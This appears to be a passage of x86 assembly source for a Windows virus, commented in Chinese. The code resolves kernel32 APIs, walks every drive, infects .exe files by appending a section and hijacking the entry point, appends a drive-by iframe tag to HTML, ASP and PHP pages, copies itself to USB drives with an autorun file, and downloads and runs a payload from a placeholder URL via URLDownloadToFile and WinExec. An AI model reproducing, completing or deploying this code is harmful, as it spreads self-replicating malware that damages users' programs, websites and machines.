;****************************************************上面这个是搜索全盘所用到数据
InfectionData:
Fir_Sec_Addr dd 0
Kernel32Address DD 0
AppStart dd 0
Vlen dd (offset VirusEnd- offset VirusStart)
ImageBase dd 0
HFcreatefilemapping dd 0
HFmapviewoffile dd 0
sec_align dd 0
file_align dd 0
oldEnd dd 0
oldEip dd 0
NewIp dd 0
PE_Head dd 0
FileHandle dd 0
Now_Sec_Addr dd 0
SetJmpOepsize dd (offset SetJmpOepEnd- offset SetJmpOep)
OepData dd 0
Cur_Sec_Addr dd 0
WriteAddr dd 0
;****************************************************上面这个是感染PE文件所用到数据
WebPageSpreadData:
GuaMa db '</iframe>',0 ;替换XX里的数据为挂马的代码
WriteData dd 0
ReadData dd 0
SpreadWebPageH dd 0
;****************************************************上面这个是感染网页所用到数据
OtherData:
InfectedFlag db 0
DownedName db 'c:\windows\system32\exefix.exe',0
DownName db 'http://xxxxxxxxx/xx.exe',0;建议 最好给下扩展名
DownloaderFlag db 'C:\windows\KB962412.txt',0
DllnameUrl db 'urlmon.dll',0
DllNameUser db 'user32.dll',0
;***************************************************************************************************************其他数据
Begin:
GetAPIAddr:
lea esi,[ebp+szCopyFileA]
call GetFunctionAddress
mov [ebp+_CopyFileA],eax
lea esi,[ebp+szGetModuleFileNameA]
call GetFunctionAddress
mov [ebp+_GetModuleFileNameA],eax
lea esi,[ebp+szLoadLibraryA]
call GetFunctionAddress
mov [ebp+_LoadLibraryA],eax
lea esi,[ebp+szFreeLibrary]
call GetFunctionAddress
mov [ebp+_FreeLibrary],eax
lea esi,[ebp+szReadFile]
call GetFunctionAddress
mov [ebp+_ReadFile],eax
lea esi,[ebp+szWriteFile]
call GetFunctionAddress
mov [ebp+_WriteFile],eax
lea esi,[ebp+szSetFileAttributesA]
call GetFunctionAddress
mov [ebp+_SetFileAttributesA],eax
lea esi,[ebp+szGetProcAddress]
call GetFunctionAddress
mov [ebp+_GetProcAddress],eax
lea esi,[ebp+szGetDriveTypeA]
call GetFunctionAddress
mov [ebp+_GetDriveType],eax
lea esi,[ebp+szCloseHandle]
call GetFunctionAddress
mov [ebp+_CloseHandle],eax
lea esi,[ebp+szCreateFileA]
call GetFunctionAddress
mov [ebp+_CreateFileA],eax
lea esi,[ebp+szCreateFileMappingA];
call GetFunctionAddress
mov [ebp+_CreateFileMappingA],eax
lea esi,[ebp+szMapViewOfFile]
call GetFunctionAddress
mov [ebp+_MapViewOfFile],eax
lea esi,[ebp+szSetEndOfFile]
call GetFunctionAddress
mov [ebp+_SetEndOfFile],eax
lea esi,[ebp+szSetFilePointer]
call GetFunctionAddress
mov [ebp+_SetFilePointer],eax
lea esi,[ebp+szUnmapViewOfFile]
call GetFunctionAddress
mov [ebp+_UnmapViewOfFile],eax
lea esi,[ebp+szExitProcess]
call GetFunctionAddress
mov [ebp+_ExitProcess],eax
lea esi, [ebp+szFindFirstFileA]
call GetFunctionAddress
mov [ebp+_FindFirstFileA], eax
lea esi, [ebp+szFindNextFileA]
call GetFunctionAddress
mov [ebp+_FindNextFileA], eax
lea esi,[ebp+szFindClose]
call GetFunctionAddress
mov [ebp+_FindClose],eax
lea esi,[ebp+szGetFileSize];
call GetFunctionAddress
mov [ebp+_GetFileSize],eax
lea esi,[ebp+szSetCurrentDirectoryA]
call GetFunctionAddress
mov [ebp+_SetCurrentDirectoryA],eax
lea esi,[ebp+szGetCurrentDirectoryA]
call GetFunctionAddress
mov [ebp+_GetCurrentDirectoryA],eax
lea esi,[ebp+DllnameUrl]
push esi
call [ebp+_LoadLibraryA]
lea esi,[ebp+szURLDownloadToFile]
push esi
push eax
call [ebp+_GetProcAddress]
mov [ebp+_URLDownloadToFile],eax ;失败就退出 这个函数是用来下载的
lea esi,[ebp+szWinExec]
call GetFunctionAddress
mov [ebp+_WinExec],eax
lea esi,[ebp+DllNameUser]
push esi
call [ebp+_LoadLibraryA]
lea esi,[ebp+szwsprintfA]
push esi
push eax
call [ebp+_GetProcAddress]
mov [ebp+_wsprintfA],eax
;************************************************************需要的函数已经找到了*************************************************************************
@Next:
Spread:
lea esi,[ebp+CurrentDir];检查下是什么盘 硬盘还是U盘
push esi
call [ebp+_GetDriveType]
cmp eax,3 ;假如是硬盘
jnz NOTDISK
call SpreadExeFile
NOTDISK:
cmp eax,2 ;假如是U盘
jnz ADDDISK
call SpreadUDisk
;如果都不是就遍历找咯
ADDDISK:
cmp byte ptr [ebp+CurrentDir],'z';检查是否已经到最后一盘了
jz GoToWork2 ;如果是到最后一盘就说明结束了
inc byte ptr [ebp+CurrentDir] ;C加1就是D了 如此循环26次 因为最多也就到Z盘
jmp Spread ;遍历
SpreadExeFile:
sub esp,4
lea esi,[ebp+CurrentDir]
mov edi,esp
movsd
call SearchFiles; 开始找了
lea edi,[ebp+CurrentDir]
mov esi,esp
movsd
add esp,4
ret
SpreadUDisk:
call WriteAuto
ret
;************************************************************************MAIN程序***************************************************************
SearchFiles:
SearchFirst:
sub esp,4
mov dword ptr [esp],'refV' ;一个感染标志
SearchSec:
lea esi,[ebp+cDir] ;260byte
push esi
push 128h
call [ebp+_GetCurrentDirectoryA] ;调用函数
mov esi,[ebp+CurrentDir]
cmp byte ptr [ebp+SearchFlag],0 ;检查是否为0 为0 说明不是新的文件甲那么就直接执行下去
jnz SearchBegin ;不为0就跳过去
lea esi,[ebp+CurrentDir]
push esi
lea edi,[ebp+cSubDir]
mov ecx,3
rep movsb
pop esi
SearchBegin:
push esi ;设置指定的盘
call [ebp+_SetCurrentDirectoryA] ;获取盘
lea esi,[ebp+win32_find_data]
push esi ;
lea edx,[ebp+SearchString]
push edx
call [ebp+_FindFirstFileA] ;开始查找 找的是*.* 之后再分析
mov [ebp+FindHandle],eax ;保存句柄
inc eax
jz SearchClose ;是否为0 为0就是失败 失败就退出
dec eax
SearchAgian:
cmp byte ptr [ebp+win32_find_data.FullFileName],'.';是就继续查找
jz SearchNext ;如果不是上一级就不
cmp [ebp+win32_find_data.FileAttributes],10h;是否为文件夹
jz SaveDir ;不是文件夹
cmp [ebp+win32_find_data.FileAttributes],16h
jz SearchNext ;如果发现是系统目录就直接跳过去
cmp [ebp+win32_find_data.FileAttributes],11h
jz SearchNext ;如果发现是系统目录就直接跳过去
cmp [ebp+win32_find_data.FileAttributes],30h;是否为文件夹
jz SaveDir ;不是文件夹
;遍历操作
search:
mov byte ptr [ebp+win32_find_data.FullFileName+250],0BBH
xor ecx,ecx
search2E:
inc cl ;再次查找 是否为0
cmp byte ptr [ebp+win32_find_data.FullFileName+ecx],0BBH
jz SearchNext
cmp byte ptr [ebp+win32_find_data.FullFileName+ecx],'.'
jnz search2E
cmp dword ptr [ebp+win32_find_data.FullFileName+ecx],'exe.' ;查到是EXE文件
jnz SearchEXE
pushad
call InfectFiles
popad
SearchEXE:
cmp dword ptr [ebp+win32_find_data.FullFileName+ecx],'EXE.' ;查到是EXE文件
jnz SearchHTM
pushad
call InfectFiles
popad
SearchHTM:
cmp dword ptr [ebp+win32_find_data.FullFileName+ecx],'mth.' ;查到是HTM文件
jnz SearchASP
pushad
call SpreadWebPage
popad
SearchASP:
cmp dword ptr [ebp+win32_find_data.FullFileName+ecx],'psa.' ;查到是ASP文件
jnz SearchPHP
pushad
call SpreadWebPage
popad
SearchPHP:
cmp dword ptr [ebp+win32_find_data.FullFileName+ecx],'php.' ;查到是PHP文件
jnz SearchHTML
pushad
call SpreadWebPage
popad
SearchHTML:
cmp dword ptr [ebp+win32_find_data.FullFileName+ecx+1],'lmth' ;查到是HTML文件
jnz SearchNext
pushad
call SpreadWebPage
popad
jmp SearchNext
SaveDir:
cmp byte ptr [ebp+FoundFlag],0
jz SaveDir@
sub esp,4
mov dword ptr [esp],0BBBBBBBBH
SaveDir@:
sub esp,20h
mov edi,esp
lea esi,[ebp+win32_find_data.FullFileName]
mov ecx,20h
rep movsb ;保存目录的名字
mov byte ptr [ebp+FoundFlag],0
inc byte ptr [ebp+FoundNum]
SearchNext:
lea ebx,[ebp+win32_find_data]
push ebx
push [ebp+FindHandle]
call [ebp+_FindNextFileA]
or eax,eax
jnz SearchAgian ;如果还有文件要查找
mov byte ptr [ebp+FoundFlag],1 ;设置标志说明要进入下一个层了
cmp dword ptr [esp],'refV' ;检查是否已经会到头了
jz FixedBeforeSearchHandleClose ;如果已经扫描完毕
;如果不是扫描完毕 就继续
cmp dword ptr [esp],0BBBBBBBBH
jz UpDir ;说明该层已经结束了 进入上一层
mov esi,esp
lea edi,[ebp+win32_find_data.FullFileName]
mov ecx,20h
rep movsb
add esp,20h ;把目录拿出来 接下来就是进入先的目录了
cmp byte ptr [ebp+FoundNum],0
jz UpDir1 ;说明该层已经结束了 进入上一层
cmp byte ptr [ebp+FirstFind],2
jb SetNewDir ;不为0 就是不操作了
mov byte ptr [ebp+FoundNum],0
jmp SetNewDir
UpDir1:
xor ecx,ecx
Check_:
cmp byte ptr [ebp+cSubDir+98+ecx],05ch
jz Find_
add ecx,-1
jmp Check_
Find_:
mov byte ptr [ebp+cSubDir+98+ecx],0 ;设置为0 因为都是以0为参考的
lea edi,[ebp+cSubDir+98+ecx]
mov ecx,30h
xor eax,eax
rep stosb
lea edi,[ebp+cSubDir]
mov [ebp+CurrentDir],edi
jmp SetNewDir
UpDir:
add esp,4
cmp dword ptr [esp],'refV' ;检查是否已经会到头了
jz FixedBeforeSearchHandleClose ;如果已经扫描完毕
xor ecx,ecx
Check_1:
cmp byte ptr [ebp+cSubDir+98+ecx],05ch
jz Find_1
add ecx,-1
jmp Check_1
Find_1:;
add ecx,-1
cmp byte ptr [ebp+cSubDir+98+ecx],05ch ;就修改
jnz Find_1
mov byte ptr [ebp+cSubDir+98+ecx],0
cmp dword ptr [esp],0BBBBBBBBH
jnz Find_3
add esp,4
cmp dword ptr [esp],'refV' ;检查是否已经会到头了
jz FixedBeforeSearchHandleClose ;如果已经扫描完毕
Find_2:
add ecx,-1
cmp byte ptr [ebp+cSubDir+98+ecx],05ch ;就修改
jnz Find_2
mov byte ptr [ebp+cSubDir+98+ecx],0
cmp dword ptr [esp],0BBBBBBBBH
jnz Find_3
add esp,4
cmp dword ptr [esp],'refV' ;检查是否已经会到头了
jz FixedBeforeSearchHandleClose ;如果已经扫描完毕
jmp Find_2
Find_3:
lea edi,[ebp+cSubDir+98+ecx]
mov ecx,30h
xor eax,eax
rep stosb
lea edi,[ebp+cSubDir]
mov [ebp+CurrentDir],edi
mov esi,esp
lea edi,[ebp+win32_find_data.FullFileName]
mov ecx,20h
rep movsb
add esp,20h ;把目录拿出来 接下来就是进入先的目录了
;lea esi,[ebp+win32_find_data.FullFileName]
;mov ecx,20h
;rep movsb
;mov byte ptr [ebp+SearchFlag],1
;jmp SearchSec
SetNewDir:
lea edx,[ebp+win32_find_data.FullFileName];16 22
push edx ;第一个参数
mov esi,[ebp+CurrentDir]
cmp byte ptr [ebp+SearchFlag],0
jnz IsDir
LEA esi,[ebp+CurrentDir] ;第二个参数
IsDir:
push esi
lea edx,[ebp+lpFormat]
push edx ;第三个参数
lea edx,[ebp+cSubDir]
push edx ;第四个参数
call [ebp+_wsprintfA] ;设置
add esp,10h
lea eax,[ebp+cSubDir] ;做为地址
mov [ebp+CurrentDir],eax
mov byte ptr [ebp+SearchFlag],1
lea eax,[ebp+cSubDir]
mov [ebp+CurrentDir],eax
inc byte ptr [ebp+FirstFind]
mov byte ptr [ebp+FoundNum],0
jmp SearchSec
FixedBeforeSearchHandleClose:
add esp,4
SearchHandleClose:
push dword ptr[ebp+FindHandle]
call [ebp+_FindClose]
SearchClose:
ret
;*******************************************************************以上是查找过程**********************************************************************
WriteAuto:
;U盘传播的code
;直接覆盖原来的文件
xor edi,edi
lea edi,[ebp+autoexec];申请一段空白
lea esi,[ebp+CurrentDir]
push 03h
pop ecx
rep movsb
push edi
lea edi,[ebp+USpreadName]
rep movsb
lea esi,[ebp+AutoexecEXEname]
push 0ch
pop ecx
rep movsb
pop edi
xor esi,esi
lea esi,[ebp+AutoexecName]
push 0ch
pop ecx
rep movsb
lea esi,[ebp+autoexec]
call OpenFile ;建立一个文件Autoexec.inf文件
inc eax
test eax,eax
jz WriteAutoClose
dec eax
mov [ebp+WriteAutoHandle],eax
push 0
push [ebp+WriteData]
push 55;字节数
lea edx,[ebp+szWirte]
push edx
push eax
call [ebp+_WriteFile] ;写文件 因为重写所以无须设置位置
push [ebp+WriteAutoHandle]
call [ebp+_CloseHandle]
;现在我们设置文件属性
push 6
push edx
call [ebp+_SetFileAttributesA]
push 32h
lea esi,[ebp+UDiskBuffer]
push esi
push 0
call [ebp+_GetModuleFileNameA]
test eax,eax ;是否错误
jz WriteAutoClose ;失败就退出
push 0
lea esi,[ebp+USpreadName]
push esi
lea esi,[ebp+UDiskBuffer]
push esi
call [ebp+_CopyFileA]
WriteAutoClose:
ret
;**************************************************************************以上过程是U盘传播************************************************************
SpreadWebPage:
;网页传播的code
;先检查下文件的末尾是否有</frame>字样 有说明文件已经被感染了 就退出 没有就写入
lea esi,[ebp+win32_find_data.FullFileName];
push 80H
push esi
call [ebp+_SetFileAttributesA];先设置属性
call OpenFileE
mov [ebp+SpreadWebPageH],eax
inc eax
test eax,eax
jz SpreadError
;设置位置
mov ecx,dword ptr [ebp+win32_find_data.FileSizeLow]
sub ecx,9;因为那个标志占了 9个字符
push 1
xor eax,eax
push eax
push ecx
push [ebp+SpreadWebPageH]
call [ebp+_SetFilePointer]
;接下来设置下标志
push 0
lea esi,[ebp+ReadData]
push esi
push 9
lea esi,[ebp+GuaMa]
push esi
push [ebp+SpreadWebPageH]
call [ebp+_ReadFile] ;查找标志
test eax,eax
jz SpreadClose ;如果找到就退出
;这里开始写挂马的代码
push 2
xor eax,eax
push eax
push eax
push [ebp+SpreadWebPageH]
call [ebp+_SetFilePointer]
push 0
lea esi,[ebp+WriteData]
push esi
;***************************************************有个假设
push 9 ;这里的X是挂马的数据大小
;******************************************************************
lea esi,[ebp+GuaMa]
push esi
push [ebp+SpreadWebPageH]
call [ebp+_WriteFile]
;写入数据完毕
SpreadClose:
push [ebp+SpreadWebPageH]
call [ebp+_CloseHandle]
SpreadError:
ret
;*************************************************************************以上的是网页传播**************************************************************
InfectFiles:
lea esi,[ebp+win32_find_data.FullFileName];
push 80H
push esi
call [ebp+_SetFileAttributesA]
call OpenFile
mov [ebp+FileHandle],eax
inc eax
test eax,eax
jz error_Final
mov ecx,dword ptr [ebp+win32_find_data.FileSizeLow]
add ecx,01000h
push ecx
call CreateMap
test eax,eax
jz error_CreateMap
mov [ebp+HFcreatefilemapping],eax;
pop ecx
call MapFile
test eax,eax
jz error_MapFile
mov [ebp+HFmapviewoffile],eax
Injection:
xchg esi,eax
cmp word ptr [esi],5A4Dh;
jnz error_MapFile
add esi,[esi+3ch];
cmp word ptr [esi],4550h
jnz error_MapFile
cmp dword ptr [esi+08h],'vfer'
jz @Close ;has been infect
mov [ebp+PE_Head],esi
push 0h
pop dword ptr [esi+0d0h]
push 0h
pop dword ptr[esi+0d4h]
mov ebx, dword ptr[esi+38h]
mov [ebp+sec_align],ebx
mov edi,dword ptr [esi+3ch]
mov [ebp+file_align],edi
mov ebx,dword ptr [esi+28h]
add ebx,[esi+34h]
mov [ebp+oldEip],ebx
movzx ebx,word ptr [esi+14h];
lea eax,[esi+ebx+18h];
movzx ecx,word ptr [esi+06h];
cmp ecx,8
ja @Close
xchg esi,eax
mov dword ptr [ebp+Fir_Sec_Addr],esi
;****************************************************************************************************************************
;First i check if program had been packed
;*******************************************************************************************************************************
RandNum:
RDTSC;
and eax,00000002h;
xchg eax,ecx
imul ecx,ecx,28h;
add esi,ecx;;
mov dword ptr [ebp+Cur_Sec_Addr],esi
mov ebx,dword ptr [esi+08h];
mov edx,dword ptr [esi+0ch];
add edx,ebx
mov dword ptr [ebp+OepData],edx;
mov edx,dword ptr [esi+10h];
sub edx,dword ptr [esi+08h];
js error_MapFile ;
mov edi,dword ptr [esi+14h];
add edi,dword ptr [esi+08h]
add edi,dword ptr [ebp+HFmapviewoffile];
sub edx,5
RandData:
push edx
RDTSC
pop edx
AND eax,edx
test eax,eax
jz RandData
mov edx,dword ptr [ebp+OepData]
add edx,eax
mov dword ptr[ebp+OepData],edx
add edi,eax
mov dword ptr [ebp+WriteAddr],edi
cmp dword ptr [edi],00000000h
jnz error_MapFile
;***********************************************************
; ok if the program hadnt packed i append a section
;**************************************************************
mov esi,dword ptr [PE_Head]
movzx ecx,word ptr[esi+06h] ;
inc word ptr [esi+06h]
imul ecx,ecx,28h ;
mov esi,dword ptr [ebp+Fir_Sec_Addr]
add esi,ecx
mov dword ptr [ebp+Now_Sec_Addr],esi
mov dword ptr[esi],' '
mov ebx,dword ptr[ebp+Vlen]
mov dword ptr [esi+08h],ebx
mov dword ptr [esi+24h],0e0000020h
mov eax,dword ptr [esi-28h+08h] ;
mov ebx,dword ptr[ebp+sec_align]
cmp eax,ebx
xor ecx,ecx
jb @1
@@@@1:
push eax
sub eax,ebx
js @@@@2
inc ecx
pop eax
sub eax,dword ptr [ebp+sec_align]
jmp @@@@1
@@@@2:
pop eax
inc ecx
mov eax,dword ptr [ebp+sec_align]
mul ecx
xchg eax,ebx
@1:
add ebx,dword ptr [esi-28h+0ch]
mov dword ptr [esi+0ch],ebx
@@1:
mov dword ptr [ebp+NewIp],ebx
mov eax,dword ptr [ebp+Vlen]
mov ebx,dword ptr [ebp+file_align];
xor ecx,ecx
cmp eax,ebx
jb @2
@@@@3:
push eax
sub eax,ebx
js @@@@4
inc ecx
pop eax
sub eax,dword ptr [ebp+file_align]
jmp @@@@3
@@@@4:
pop eax
inc ecx
mov eax,dword ptr [ebp+file_align]
mul ecx
xchg eax,ebx
@2:
mov dword ptr [esi+10h],ebx
@@2:
mov eax,dword ptr [esi-28h+14h]
mov ebx,dword ptr [esi-28h+10h]
add eax,ebx
mov dword ptr [esi+14h],eax
mov [ebp+oldEnd],eax ;
;******************************************************************************************************************************************************
;Here i set "JMP xxxxxxxx" in the space where alway no data in it
; however, you also can set other data or code in it if the area have enough space
;******************************************************************************************************************************************************
RandSetData:
mov edi,dword ptr [ebp+WriteAddr] ; haha a joke
mov esi,offset SetJmpOep
mov ecx,[ebp+SetJmpOepsize]
cld
rep movsb
mov edx,dword ptr [ebp+OepData]
add edx,5
mov esi,dword ptr [ebp+Now_Sec_Addr]
mov ebx,dword ptr [esi+0ch]
sub ebx,edx
mov dword ptr [edi],ebx
mov eax,dword ptr [ebp+PE_Head]
mov ebx,dword ptr [ebp+OepData]
mov dword ptr [eax+28h],ebx
mov ebx,[eax+50h]
add ebx,[ebp+Vlen]
mov ecx,[ebp+sec_align]
xor edx,edx
xchg eax,ebx
cdq
div ecx
test edx,edx
je @@@4
inc eax
@@@4:
mul ecx
xchg eax,ebx
mov [eax+50h],ebx
mov dword ptr [eax+8h],'vfer'
cld
mov ecx,[ebp+Vlen]
mov edi,[ebp+oldEnd]
add edi,[ebp+HFmapviewoffile]
lea esi,[ebp+VirusStart]
rep movsb
xor eax,eax
sub edi,[ebp+HFmapviewoffile]
push 0h
push 0h
push edi
push [ebp+FileHandle]
call [ebp+_SetFilePointer]
push [ebp+FileHandle]
call [ebp+_SetEndOfFile]
@Close:
call UnMapFile
call UnCreateMap
call UnOpenFile
ret
;*****************************************************************以上的这个是EXE感染过程****************************************************************
GetFunctionAddress PROC
mov eax, [ebp+Kernel32Address] ;EAX = Kernel32 Address
mov ebx, [eax+3Ch]
add ebx, eax
add ebx, 120
mov ebx, [ebx]
add ebx, eax ;EBX = Export Address
xor edx, edx
mov ecx, [ebx+32]
add ecx, eax
push esi
push edx
CompareNext:
pop edx
pop esi
inc edx
mov edi, [ecx]
add edi, eax
add ecx, 4
push esi
push edx
CompareName:
mov dl, [edi]
mov dh, [esi]
cmp dl, dh
jne CompareNext
inc edi
inc esi
cmp byte ptr [esi], 0
je GetAddress
jmp CompareName
GetAddress:
pop edx
pop esi
dec edx
shl edx, 1
mov ecx, [ebx+36]
add ecx, eax
add ecx, edx
xor edx, edx
mov dx, [ecx]
shl edx, 2
mov ecx, [ebx+28]
add ecx, eax
add ecx, edx
add eax, [ecx]
ret
GetFunctionAddress ENDP
MapFile proc ; ECX为文件大小
xor eax,eax
push ecx
push eax
push eax
push 00000002h
push dword ptr [ebp+HFcreatefilemapping]
call [ebp+_MapViewOfFile]
ret
MapFile endp
CreateMap proc ;Ecx为病毒大小
xor eax,eax
push eax
push ecx
push eax
push 00000004h
push eax
push dword ptr [ebp+FileHandle]
call [ebp+_CreateFileMappingA]
ret
CreateMap endp
OpenFile proc
xor eax,eax ;ESI指向病毒的句柄
push eax
push eax
push 00000003h
push eax
inc eax
push eax
push 80000000h or 40000000h
push esi
call [ebp+_CreateFileA] ;打开指定文件
ret
OpenFile endp
OpenFileE proc
xor eax,eax ;ESI指向病毒的句柄
push eax
push 00000080h
push 00000004h
push eax
push 00000002h
push 80000000h or 40000000h
push esi
call [ebp+_CreateFileA] ;打开指定文件
ret
OpenFileE endp
SetJmpOep:
db 0E9h
SetJmpOepEnd:
UnMapFile proc
push [ebp+HFmapviewoffile]
call [ebp+_UnmapViewOfFile]
ret
UnMapFile endp
UnCreateMap proc
push [ebp+HFcreatefilemapping]
call [ebp+_CloseHandle];
ret
UnCreateMap endp
UnOpenFile proc
push [ebp+FileHandle]
call [ebp+_CloseHandle]
ret
UnOpenFile endp
GoToWork:
;********************************************************************************************
;这里是要执行代码
;先检查下是否为已经下载
mov byte ptr [ebp+InfectedFlag],1
GoToWork2:
push 80h
lea esi,[ebp+DownloaderFlag]
push esi
call [ebp+_SetFileAttributesA]
test eax,eax;如果失败了
jnz CheckBeforBack
;如果要下载多个程序
xor eax,eax
push eax
push eax
lea esi,[ebp+DownedName]
push esi
lea esi,[ebp+DownName]
push esi
push eax
call [ebp+_URLDownloadToFile]
;下载完毕 接着 设置标志 建立一个文件
lea esi,[ebp+DownloaderFlag]
call OpenFileE ;打开文件
push eax
call [ebp+_CloseHandle]
;设置标志完成
push 1
lea esi,[ebp+DownedName]
push esi
call [ebp+_WinExec]
CheckBeforBack:
cmp byte ptr [ebp+InfectedFlag],1
jnz @Exit
;要执行的代码
GoBack:
mov eax,dword ptr[ebp+oldEip]
jmp eax
error_MapFile:
call UnMapFile
error_CreateMap:
call UnCreateMap
error_Final:
call UnOpenFile
ret
@Exit:
push 0h
call [ebp+_ExitProcess];
VirusEnd:
end VirusMain